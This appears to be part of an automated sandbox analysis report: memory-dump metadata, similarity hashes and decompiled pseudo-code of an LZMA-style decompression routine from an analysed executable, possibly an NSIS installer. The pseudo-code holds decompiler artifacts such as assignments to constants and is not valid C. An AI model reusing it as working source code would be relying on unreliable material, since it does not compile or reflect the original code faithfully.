                                                                                                                          0x00406534
                                                                                                                          0x00406563
                                                                                                                          0x0040656a
                                                                                                                          0x004064f4
                                                                                                                          0x004064f4
                                                                                                                          0x004064f4
                                                                                                                          0x004064f4
                                                                                                                          0x00000000
                                                                                                                          0x0040656c
                                                                                                                          0x00000000
                                                                                                                          0x0040656c
                                                                                                                          0x0040656a
                                                                                                                          0x0040647d
                                                                                                                          0x00406480
                                                                                                                          0x00406482
                                                                                                                          0x00406485
                                                                                                                          0x00406488
                                                                                                                          0x0040648b
                                                                                                                          0x0040648d
                                                                                                                          0x00406490
                                                                                                                          0x00406493
                                                                                                                          0x00406493
                                                                                                                          0x00406496
                                                                                                                          0x00406496
                                                                                                                          0x00406499
                                                                                                                          0x004064a0
                                                                                                                          0x00406474
                                                                                                                          0x00406474
                                                                                                                          0x00406474
                                                                                                                          0x00406474
                                                                                                                          0x00000000
                                                                                                                          0x004064a2
                                                                                                                          0x00000000
                                                                                                                          0x004064a2
                                                                                                                          0x004064a0
                                                                                                                          0x00406426
                                                                                                                          0x00406429
                                                                                                                          0x0040642b
                                                                                                                          0x0040642e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040618d
                                                                                                                          0x0040618d
                                                                                                                          0x00406191
                                                                                                                          0x004067d6
                                                                                                                          0x00000000
                                                                                                                          0x004067d6
                                                                                                                          0x00406197
                                                                                                                          0x0040619a

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: ab0e96aa9de7783a5fbfa8537471c17f47562fab6ccc56c1d015952012775d3a
                                                                                                                          • Instruction ID: 47c5cb8fc101d284839cddc633a7ca9263ac2e2456f843b1234a04abf02d33d1
                                                                                                                          • Opcode Fuzzy Hash: ab0e96aa9de7783a5fbfa8537471c17f47562fab6ccc56c1d015952012775d3a
                                                                                                                          • Instruction Fuzzy Hash: 0C713371D00229CBDF28CFA8C844BADBBF1FB44305F15806AD816BB281D7785A86DF54
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E00406365() {
                                                                                                                          				unsigned short _t531;
                                                                                                                          				signed int _t532;
                                                                                                                          				void _t533;
                                                                                                                          				signed int _t534;
                                                                                                                          				signed int _t535;
                                                                                                                          				signed int _t565;
                                                                                                                          				signed int _t568;
                                                                                                                          				signed int _t589;
                                                                                                                          				signed int* _t606;
                                                                                                                          				void* _t613;
                                                                                                                          
                                                                                                                          				L0:
                                                                                                                          				while(1) {
                                                                                                                          					L0:
                                                                                                                          					if( *(_t613 - 0x40) != 0) {
                                                                                                                          						 *(_t613 - 0x84) = 0xb;
                                                                                                                          						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                                                                                                                          						goto L132;
                                                                                                                          					} else {
                                                                                                                          						__eax =  *(__ebp - 0x28);
                                                                                                                          						L88:
                                                                                                                          						 *(__ebp - 0x2c) = __eax;
                                                                                                                          						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                          						L89:
                                                                                                                          						__eax =  *(__ebp - 4);
                                                                                                                          						 *(__ebp - 0x80) = 0x15;
                                                                                                                          						__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                          						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                          						L69:
                                                                                                                          						 *(__ebp - 0x84) = 0x12;
                                                                                                                          						while(1) {
                                                                                                                          							L132:
                                                                                                                          							 *(_t613 - 0x54) = _t606;
                                                                                                                          							while(1) {
                                                                                                                          								L133:
                                                                                                                          								_t531 =  *_t606;
                                                                                                                          								_t589 = _t531 & 0x0000ffff;
                                                                                                                          								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                          								if( *(_t613 - 0xc) >= _t565) {
                                                                                                                          									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                          									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                          									 *(_t613 - 0x40) = 1;
                                                                                                                          									_t532 = _t531 - (_t531 >> 5);
                                                                                                                          									 *_t606 = _t532;
                                                                                                                          								} else {
                                                                                                                          									 *(_t613 - 0x10) = _t565;
                                                                                                                          									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                          									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                                                          								}
                                                                                                                          								if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                          									goto L139;
                                                                                                                          								}
                                                                                                                          								L137:
                                                                                                                          								if( *(_t613 - 0x6c) == 0) {
                                                                                                                          									 *(_t613 - 0x88) = 5;
                                                                                                                          									L170:
                                                                                                                          									_t568 = 0x22;
                                                                                                                          									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                                                                          									_t535 = 0;
                                                                                                                          									L172:
                                                                                                                          									return _t535;
                                                                                                                          								}
                                                                                                                          								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                                                                          								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                          								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                          								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                          								L139:
                                                                                                                          								_t533 =  *(_t613 - 0x84);
                                                                                                                          								while(1) {
                                                                                                                          									 *(_t613 - 0x88) = _t533;
                                                                                                                          									while(1) {
                                                                                                                          										L1:
                                                                                                                          										_t534 =  *(_t613 - 0x88);
                                                                                                                          										if(_t534 > 0x1c) {
                                                                                                                          											break;
                                                                                                                          										}
                                                                                                                          										switch( *((intOrPtr*)(_t534 * 4 +  &M0040684B))) {
                                                                                                                          											case 0:
                                                                                                                          												if( *(_t613 - 0x6c) == 0) {
                                                                                                                          													goto L170;
                                                                                                                          												}
                                                                                                                          												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                          												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                          												_t534 =  *( *(_t613 - 0x70));
                                                                                                                          												if(_t534 > 0xe1) {
                                                                                                                          													goto L171;
                                                                                                                          												}
                                                                                                                          												_t538 = _t534 & 0x000000ff;
                                                                                                                          												_push(0x2d);
                                                                                                                          												asm("cdq");
                                                                                                                          												_pop(_t570);
                                                                                                                          												_push(9);
                                                                                                                          												_pop(_t571);
                                                                                                                          												_t609 = _t538 / _t570;
                                                                                                                          												_t540 = _t538 % _t570 & 0x000000ff;
                                                                                                                          												asm("cdq");
                                                                                                                          												_t604 = _t540 % _t571 & 0x000000ff;
                                                                                                                          												 *(_t613 - 0x3c) = _t604;
                                                                                                                          												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                                                                          												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                                                                          												_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                                                                          												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                                                                          													L10:
                                                                                                                          													if(_t612 == 0) {
                                                                                                                          														L12:
                                                                                                                          														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                                                                          														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                          														goto L15;
                                                                                                                          													} else {
                                                                                                                          														goto L11;
                                                                                                                          													}
                                                                                                                          													do {
                                                                                                                          														L11:
                                                                                                                          														_t612 = _t612 - 1;
                                                                                                                          														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                                                                          													} while (_t612 != 0);
                                                                                                                          													goto L12;
                                                                                                                          												}
                                                                                                                          												if( *(_t613 - 4) != 0) {
                                                                                                                          													GlobalFree( *(_t613 - 4));
                                                                                                                          												}
                                                                                                                          												_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                          												 *(_t613 - 4) = _t534;
                                                                                                                          												if(_t534 == 0) {
                                                                                                                          													goto L171;
                                                                                                                          												} else {
                                                                                                                          													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                                                                          													goto L10;
                                                                                                                          												}
                                                                                                                          											case 1:
                                                                                                                          												L13:
                                                                                                                          												__eflags =  *(_t613 - 0x6c);
                                                                                                                          												if( *(_t613 - 0x6c) == 0) {
                                                                                                                          													 *(_t613 - 0x88) = 1;
                                                                                                                          													goto L170;
                                                                                                                          												}
                                                                                                                          												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                          												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                                                                          												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                          												_t45 = _t613 - 0x48;
                                                                                                                          												 *_t45 =  *(_t613 - 0x48) + 1;
                                                                                                                          												__eflags =  *_t45;
                                                                                                                          												L15:
                                                                                                                          												if( *(_t613 - 0x48) < 4) {
                                                                                                                          													goto L13;
                                                                                                                          												}
                                                                                                                          												_t546 =  *(_t613 - 0x40);
                                                                                                                          												if(_t546 ==  *(_t613 - 0x74)) {
                                                                                                                          													L20:
                                                                                                                          													 *(_t613 - 0x48) = 5;
                                                                                                                          													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                                                                          													goto L23;
                                                                                                                          												}
                                                                                                                          												 *(_t613 - 0x74) = _t546;
                                                                                                                          												if( *(_t613 - 8) != 0) {
                                                                                                                          													GlobalFree( *(_t613 - 8)); // executed
                                                                                                                          												}
                                                                                                                          												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                                                                          												 *(_t613 - 8) = _t534;
                                                                                                                          												if(_t534 == 0) {
                                                                                                                          													goto L171;
                                                                                                                          												} else {
                                                                                                                          													goto L20;
                                                                                                                          												}
                                                                                                                          											case 2:
                                                                                                                          												L24:
                                                                                                                          												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                                                                          												 *(_t613 - 0x84) = 6;
                                                                                                                          												 *(_t613 - 0x4c) = _t553;
                                                                                                                          												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                                                                                          												L132:
                                                                                                                          												 *(_t613 - 0x54) = _t606;
                                                                                                                          												goto L133;
                                                                                                                          											case 3:
                                                                                                                          												L21:
                                                                                                                          												__eflags =  *(_t613 - 0x6c);
                                                                                                                          												if( *(_t613 - 0x6c) == 0) {
                                                                                                                          													 *(_t613 - 0x88) = 3;
                                                                                                                          													goto L170;
                                                                                                                          												}
                                                                                                                          												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                          												_t67 = _t613 - 0x70;
                                                                                                                          												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                                                                          												__eflags =  *_t67;
                                                                                                                          												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                          												L23:
                                                                                                                          												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                                                                          												if( *(_t613 - 0x48) != 0) {
                                                                                                                          													goto L21;
                                                                                                                          												}
                                                                                                                          												goto L24;
                                                                                                                          											case 4:
                                                                                                                          												L133:
                                                                                                                          												_t531 =  *_t606;
                                                                                                                          												_t589 = _t531 & 0x0000ffff;
                                                                                                                          												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                          												if( *(_t613 - 0xc) >= _t565) {
                                                                                                                          													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                          													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                          													 *(_t613 - 0x40) = 1;
                                                                                                                          													_t532 = _t531 - (_t531 >> 5);
                                                                                                                          													 *_t606 = _t532;
                                                                                                                          												} else {
                                                                                                                          													 *(_t613 - 0x10) = _t565;
                                                                                                                          													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                          													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                                                          												}
                                                                                                                          												if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                          													goto L139;
                                                                                                                          												}
                                                                                                                          											case 5:
                                                                                                                          												goto L137;
                                                                                                                          											case 6:
                                                                                                                          												__edx = 0;
                                                                                                                          												__eflags =  *(__ebp - 0x40);
                                                                                                                          												if( *(__ebp - 0x40) != 0) {
                                                                                                                          													__eax =  *(__ebp - 4);
                                                                                                                          													__ecx =  *(__ebp - 0x38);
                                                                                                                          													 *(__ebp - 0x34) = 1;
                                                                                                                          													 *(__ebp - 0x84) = 7;
                                                                                                                          													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                          													while(1) {
                                                                                                                          														L132:
                                                                                                                          														 *(_t613 - 0x54) = _t606;
                                                                                                                          														goto L133;
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                          												__esi =  *(__ebp - 0x60);
                                                                                                                          												__cl = 8;
                                                                                                                          												__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                          												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                          												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                          												__ecx =  *(__ebp - 0x3c);
                                                                                                                          												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                          												__ecx =  *(__ebp - 4);
                                                                                                                          												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                          												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                          												__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                          												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                          												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                          												if( *(__ebp - 0x38) >= 4) {
                                                                                                                          													__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                          													if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                          														_t98 = __ebp - 0x38;
                                                                                                                          														 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                          														__eflags =  *_t98;
                                                                                                                          													} else {
                                                                                                                          														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                          													}
                                                                                                                          												} else {
                                                                                                                          													 *(__ebp - 0x38) = 0;
                                                                                                                          												}
                                                                                                                          												__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                          												if( *(__ebp - 0x34) == __edx) {
                                                                                                                          													__ebx = 0;
                                                                                                                          													__ebx = 1;
                                                                                                                          													goto L61;
                                                                                                                          												} else {
                                                                                                                          													__eax =  *(__ebp - 0x14);
                                                                                                                          													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                          													__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                          													if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                          														__eax = __eax +  *(__ebp - 0x74);
                                                                                                                          														__eflags = __eax;
                                                                                                                          													}
                                                                                                                          													__ecx =  *(__ebp - 8);
                                                                                                                          													__ebx = 0;
                                                                                                                          													__ebx = 1;
                                                                                                                          													__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                          													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                          													goto L41;
                                                                                                                          												}
                                                                                                                          											case 7:
                                                                                                                          												__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                          												if( *(__ebp - 0x40) != 1) {
                                                                                                                          													__eax =  *(__ebp - 0x24);
                                                                                                                          													 *(__ebp - 0x80) = 0x16;
                                                                                                                          													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                          													__eax =  *(__ebp - 0x28);
                                                                                                                          													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                          													__eax =  *(__ebp - 0x2c);
                                                                                                                          													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                          													__eax = 0;
                                                                                                                          													__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                          													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                          													__al = __al & 0x000000fd;
                                                                                                                          													__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                          													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                          													__eax =  *(__ebp - 4);
                                                                                                                          													__eax =  *(__ebp - 4) + 0x664;
                                                                                                                          													__eflags = __eax;
                                                                                                                          													 *(__ebp - 0x58) = __eax;
                                                                                                                          													goto L69;
                                                                                                                          												}
                                                                                                                          												__eax =  *(__ebp - 4);
                                                                                                                          												__ecx =  *(__ebp - 0x38);
                                                                                                                          												 *(__ebp - 0x84) = 8;
                                                                                                                          												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                          												while(1) {
                                                                                                                          													L132:
                                                                                                                          													 *(_t613 - 0x54) = _t606;
                                                                                                                          													goto L133;
                                                                                                                          												}
                                                                                                                          											case 8:
                                                                                                                          												__eflags =  *(__ebp - 0x40);
                                                                                                                          												if( *(__ebp - 0x40) != 0) {
                                                                                                                          													__eax =  *(__ebp - 4);
                                                                                                                          													__ecx =  *(__ebp - 0x38);
                                                                                                                          													 *(__ebp - 0x84) = 0xa;
                                                                                                                          													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                          												} else {
                                                                                                                          													__eax =  *(__ebp - 0x38);
                                                                                                                          													__ecx =  *(__ebp - 4);
                                                                                                                          													__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                          													 *(__ebp - 0x84) = 9;
                                                                                                                          													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                          													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                          												}
                                                                                                                          												while(1) {
                                                                                                                          													L132:
                                                                                                                          													 *(_t613 - 0x54) = _t606;
                                                                                                                          													goto L133;
                                                                                                                          												}
                                                                                                                          											case 9:
                                                                                                                          												__eflags =  *(__ebp - 0x40);
                                                                                                                          												if( *(__ebp - 0x40) != 0) {
                                                                                                                          													goto L89;
                                                                                                                          												}
                                                                                                                          												__eflags =  *(__ebp - 0x60);
                                                                                                                          												if( *(__ebp - 0x60) == 0) {
                                                                                                                          													goto L171;
                                                                                                                          												}
                                                                                                                          												__eax = 0;
                                                                                                                          												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                          												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                          												__eflags = _t259;
                                                                                                                          												0 | _t259 = _t259 + _t259 + 9;
                                                                                                                          												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                                                                          												goto L76;
                                                                                                                          											case 0xa:
                                                                                                                          												goto L0;
                                                                                                                          											case 0xb:
                                                                                                                          												__eflags =  *(__ebp - 0x40);
                                                                                                                          												if( *(__ebp - 0x40) != 0) {
                                                                                                                          													__ecx =  *(__ebp - 0x24);
                                                                                                                          													__eax =  *(__ebp - 0x20);
                                                                                                                          													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                          												} else {
                                                                                                                          													__eax =  *(__ebp - 0x24);
                                                                                                                          												}
                                                                                                                          												__ecx =  *(__ebp - 0x28);
                                                                                                                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                          												goto L88;
                                                                                                                          											case 0xc:
                                                                                                                          												L99:
                                                                                                                          												__eflags =  *(__ebp - 0x6c);
                                                                                                                          												if( *(__ebp - 0x6c) == 0) {
                                                                                                                          													 *(__ebp - 0x88) = 0xc;
                                                                                                                          													goto L170;
                                                                                                                          												}
                                                                                                                          												__ecx =  *(__ebp - 0x70);
                                                                                                                          												__eax =  *(__ebp - 0xc);
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												_t334 = __ebp - 0x70;
                                                                                                                          												 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                          												__eflags =  *_t334;
                                                                                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												__eax =  *(__ebp - 0x2c);
                                                                                                                          												goto L101;
                                                                                                                          											case 0xd:
                                                                                                                          												L37:
                                                                                                                          												__eflags =  *(__ebp - 0x6c);
                                                                                                                          												if( *(__ebp - 0x6c) == 0) {
                                                                                                                          													 *(__ebp - 0x88) = 0xd;
                                                                                                                          													goto L170;
                                                                                                                          												}
                                                                                                                          												__ecx =  *(__ebp - 0x70);
                                                                                                                          												__eax =  *(__ebp - 0xc);
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												_t122 = __ebp - 0x70;
                                                                                                                          												 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                          												__eflags =  *_t122;
                                                                                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												L39:
                                                                                                                          												__eax =  *(__ebp - 0x40);
                                                                                                                          												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                          												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                          													goto L48;
                                                                                                                          												}
                                                                                                                          												__eflags = __ebx - 0x100;
                                                                                                                          												if(__ebx >= 0x100) {
                                                                                                                          													goto L54;
                                                                                                                          												}
                                                                                                                          												L41:
                                                                                                                          												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                          												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                          												__ecx =  *(__ebp - 0x58);
                                                                                                                          												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                          												 *(__ebp - 0x48) = __eax;
                                                                                                                          												__eax = __eax + 1;
                                                                                                                          												__eax = __eax << 8;
                                                                                                                          												__eax = __eax + __ebx;
                                                                                                                          												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          												__ax =  *__esi;
                                                                                                                          												 *(__ebp - 0x54) = __esi;
                                                                                                                          												__edx = __ax & 0x0000ffff;
                                                                                                                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                          												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                          												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          													__cx = __ax;
                                                                                                                          													 *(__ebp - 0x40) = 1;
                                                                                                                          													__cx = __ax >> 5;
                                                                                                                          													__eflags = __eax;
                                                                                                                          													__ebx = __ebx + __ebx + 1;
                                                                                                                          													 *__esi = __ax;
                                                                                                                          												} else {
                                                                                                                          													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                          													 *(__ebp - 0x10) = __ecx;
                                                                                                                          													0x800 = 0x800 - __edx;
                                                                                                                          													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                          													__ebx = __ebx + __ebx;
                                                                                                                          													 *__esi = __cx;
                                                                                                                          												}
                                                                                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          												 *(__ebp - 0x44) = __ebx;
                                                                                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          													goto L39;
                                                                                                                          												} else {
                                                                                                                          													goto L37;
                                                                                                                          												}
                                                                                                                          											case 0xe:
                                                                                                                          												L46:
                                                                                                                          												__eflags =  *(__ebp - 0x6c);
                                                                                                                          												if( *(__ebp - 0x6c) == 0) {
                                                                                                                          													 *(__ebp - 0x88) = 0xe;
                                                                                                                          													goto L170;
                                                                                                                          												}
                                                                                                                          												__ecx =  *(__ebp - 0x70);
                                                                                                                          												__eax =  *(__ebp - 0xc);
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												_t156 = __ebp - 0x70;
                                                                                                                          												 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                          												__eflags =  *_t156;
                                                                                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          												while(1) {
                                                                                                                          													L48:
                                                                                                                          													__eflags = __ebx - 0x100;
                                                                                                                          													if(__ebx >= 0x100) {
                                                                                                                          														break;
                                                                                                                          													}
                                                                                                                          													__eax =  *(__ebp - 0x58);
                                                                                                                          													__edx = __ebx + __ebx;
                                                                                                                          													__ecx =  *(__ebp - 0x10);
                                                                                                                          													__esi = __edx + __eax;
                                                                                                                          													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          													__ax =  *__esi;
                                                                                                                          													 *(__ebp - 0x54) = __esi;
                                                                                                                          													__edi = __ax & 0x0000ffff;
                                                                                                                          													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                          													__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                          													if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          														__cx = __ax;
                                                                                                                          														_t170 = __edx + 1; // 0x1
                                                                                                                          														__ebx = _t170;
                                                                                                                          														__cx = __ax >> 5;
                                                                                                                          														__eflags = __eax;
                                                                                                                          														 *__esi = __ax;
                                                                                                                          													} else {
                                                                                                                          														 *(__ebp - 0x10) = __ecx;
                                                                                                                          														0x800 = 0x800 - __edi;
                                                                                                                          														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                          														__ebx = __ebx + __ebx;
                                                                                                                          														 *__esi = __cx;
                                                                                                                          													}
                                                                                                                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          													 *(__ebp - 0x44) = __ebx;
                                                                                                                          													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          														continue;
                                                                                                                          													} else {
                                                                                                                          														goto L46;
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          												L54:
                                                                                                                          												_t173 = __ebp - 0x34;
                                                                                                                          												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                          												__eflags =  *_t173;
                                                                                                                          												goto L55;
